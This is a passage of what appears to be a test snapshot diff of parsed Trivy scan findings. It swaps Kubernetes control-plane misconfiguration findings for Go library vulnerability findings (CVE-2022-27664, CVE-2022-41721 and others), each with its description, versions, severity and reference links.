"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", ], }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "category": "Vulnerability", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "mitigation": undefined, + "name": "handle server errors after sending GOAWAY", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(Pod 'kube-scheduler-kind-control-plane' should not set 'spec.template.volumes.hostPath')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://bugzilla.redhat.com/2107371", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/2107383", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0001", - ], - }, - "category": "Misconfiguration", - "description": "Disable anonymous requests to the API server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set '--anonymous-auth' to 'false'.", - "name": "Ensure that the --anonymous-auth argument is set to false(Ensure that the --anonymous-auth argument is set to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0001", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://bugzilla.redhat.com/2107388", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0006", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0006", - ], - }, - "category": "Misconfiguration", - "description": "Verify kubelet's certificate before establishing connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Follow the Kubernetes documentation and setup the TLS connection between the apiserver and kubelets. ", - "name": "Ensure that the --kubelet-certificate-authority argument is set as appropriate(Ensure that the --kubelet-certificate-authority argument is set as appropriate)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0006", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://bugzilla.redhat.com/2124669", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0010", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0010", - ], - }, - "category": "Misconfiguration", - "description": "Limit the rate at which the API server accepts requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Follow the Kubernetes documentation and set the desired limits in a configuration file. Then, edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml and set the below parameters.", - "name": "Ensure that the admission control plugin EventRateLimit is set(Ensure that the admission control plugin EventRateLimit is set)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0010", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://bugzilla.redhat.com/2132872", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV0012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/ksv0012", - ], - }, - "category": "Misconfiguration", - "description": "Always pull images.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --enable-admission-plugins parameter to include AlwaysPullImages.", - "name": "Ensure that the admission control plugin AlwaysPullImages is set(Ensure that the admission control plugin AlwaysPullImages is set)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv0012", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0013", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0013", - ], - }, - "category": "Misconfiguration", - "description": "The SecurityContextDeny admission controller can be used to deny pods which make use of some SecurityContext fields which could allow for privilege escalation in the cluster. This should be used where PodSecurityPolicy is not in place within the cluster.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --enable-admission-plugins parameter to include SecurityContextDeny, unless PodSecurityPolicy is already in place.", - "name": "Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used(Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0013", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0018", - ], - }, - "category": "Misconfiguration", - "description": "Disable profiling, if not needed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the below parameter.", - "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0019", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0019", - ], - }, - "category": "Misconfiguration", - "description": "Enable auditing on the Kubernetes API Server and set the desired audit log path.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-path parameter.", - "name": "Ensure that the --audit-log-path argument is set(Ensure that the --audit-log-path argument is set)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0019", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/issues/54658", + }, + { + "type": "URL", + "value": "https://go.dev/cl/428735", + }, + { + "type": "URL", + "value": "https://go.dev/issue/54658", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202209-26", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0020", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", + "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41721", + "installedVersion": "v0.0.0-20220524220425-1d687d428aca", + "packageName": "golang.org/x/net", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0020", + "https://access.redhat.com/security/cve/CVE-2022-41721", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", + "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "https://go.dev/cl/447396", + "https://go.dev/issue/56352", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "https://pkg.go.dev/vuln/GO-2023-1495", + "https://www.cve.org/CVERecord?id=CVE-2022-41721", ], }, - "category": "Misconfiguration", - "description": "Retain the logs for at least 30 days or as appropriate.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxage parameter to 30 or as an appropriate number of days.", - "name": "Ensure that the --audit-log-maxage argument is set to 30 or as appropriate(Ensure that the --audit-log-maxage argument is set to 30 or as appropriate)", + "category": "Vulnerability", + "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "mitigation": undefined, + "name": "request smuggling", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0020", + "value": "https://avd.aquasec.com/nvd/cve-2022-41721", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/security/cve/CVE-2022-41721", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + }, + { + "type": "URL", + "value": "https://go.dev/cl/447396", + }, + { + "type": "URL", + "value": "https://go.dev/issue/56352", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2023-1495", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0021", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "0.7.0", + "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20220524220425-1d687d428aca", + "packageName": "golang.org/x/net", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0021", + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", ], }, - "category": "Misconfiguration", - "description": "Retain 10 or an appropriate number of old log files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxbackup parameter to 10 or to an appropriate value.", - "name": "Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate(Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate)", + "category": "Vulnerability", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "mitigation": undefined, + "name": "avoid quadratic complexity in HPACK decoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0021", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + }, + { + "type": "URL", + "value": "https://go.dev/cl/468135", + }, + { + "type": "URL", + "value": "https://go.dev/cl/468295", + }, + { + "type": "URL", + "value": "https://go.dev/issue/57855", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", + }, + { + "type": "URL", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0022", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "0.4.0", + "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20220524220425-1d687d428aca", + "packageName": "golang.org/x/net", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0022", + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", ], }, - "category": "Misconfiguration", - "description": "Rotate log files on reaching 100 MB or as appropriate.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxsize parameter to an appropriate size in MB", - "name": "Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate(Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate)", + "category": "Vulnerability", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "mitigation": undefined, + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0022", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/2092793", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/2161274", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + }, + { + "type": "URL", + "value": "https://go.dev/cl/455635", + }, + { + "type": "URL", + "value": "https://go.dev/cl/455717", + }, + { + "type": "URL", + "value": "https://go.dev/issue/56350", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "0.3.8", + "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.7", + "packageName": "golang.org/x/text", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", ], }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", + "category": "Vulnerability", + "description": 